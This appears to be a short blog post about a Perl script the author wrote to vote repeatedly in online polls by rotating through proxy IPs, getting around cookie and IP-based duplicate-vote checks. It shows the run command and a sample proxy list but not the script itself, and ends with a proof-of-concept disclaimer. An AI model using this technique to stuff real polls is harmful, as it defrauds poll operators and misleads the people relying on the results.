Auto voting with proxy - Perl

Back to 2007 I was thinking about how people can trust electronic poll results around the Internet, the mostly used methods to prevent someone to not vote twice was to put cookies on client's computer or track the source IP address, I have challenged myself to write a script to do mass votes and bypass used methods, I have done test on several free poll software installed on my server and it was working perfectly WOW!!!.

This script is written in Perl, I have used available post scripts from Internet, but the idea of using proxy, loading proxy and using loops are mine.
The script will vote unlimited times using proxy IPs from a file that can be obtained from free proxy sites, and you can start voting from a specific proxy nr.

Below example will vote using IPs and ports in proxy.txt file and start from line nr. 2:

perl autovote.pl 2 proxy.txt

proxy.txt file:
200.64.191.49:80
209.232.145.10:8080

Note: This script can't be used on public Internet, it is only a prove of concept and I will hold no responsibility if someone use for purposes other than what I have created it for, by running the script you are hold full responsibility of it's consequences.
